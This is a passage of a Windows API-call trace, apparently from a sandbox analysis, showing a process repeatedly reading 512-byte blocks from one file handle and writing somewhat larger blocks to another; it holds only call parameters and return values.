lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.630] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.630] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.631] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.632] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.632] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x243, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.633] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.634] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.634] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.635] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.636] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.637] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.637] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.638] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.638] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.639] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.640] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.641] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.642] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.644] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.645] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.645] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.646] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.647] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.648] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.648] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.649] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.650] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.651] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.653] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.653] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.654] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.655] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.656] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.656] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.657] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.657] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.658] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.659] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.659] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.660] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.660] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.661] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.661] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.662] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.662] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.663] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.663] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.664] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.665] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.665] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.666] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.666] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.667] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.667] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.668] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.668] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.669] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.669] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.670] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.670] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.671] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.671] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.672] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.673] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.673] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.674] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.674] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.675] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.675] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.676] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.676] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x304, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.677] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.677] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.677] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.678] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x316, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.678] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, 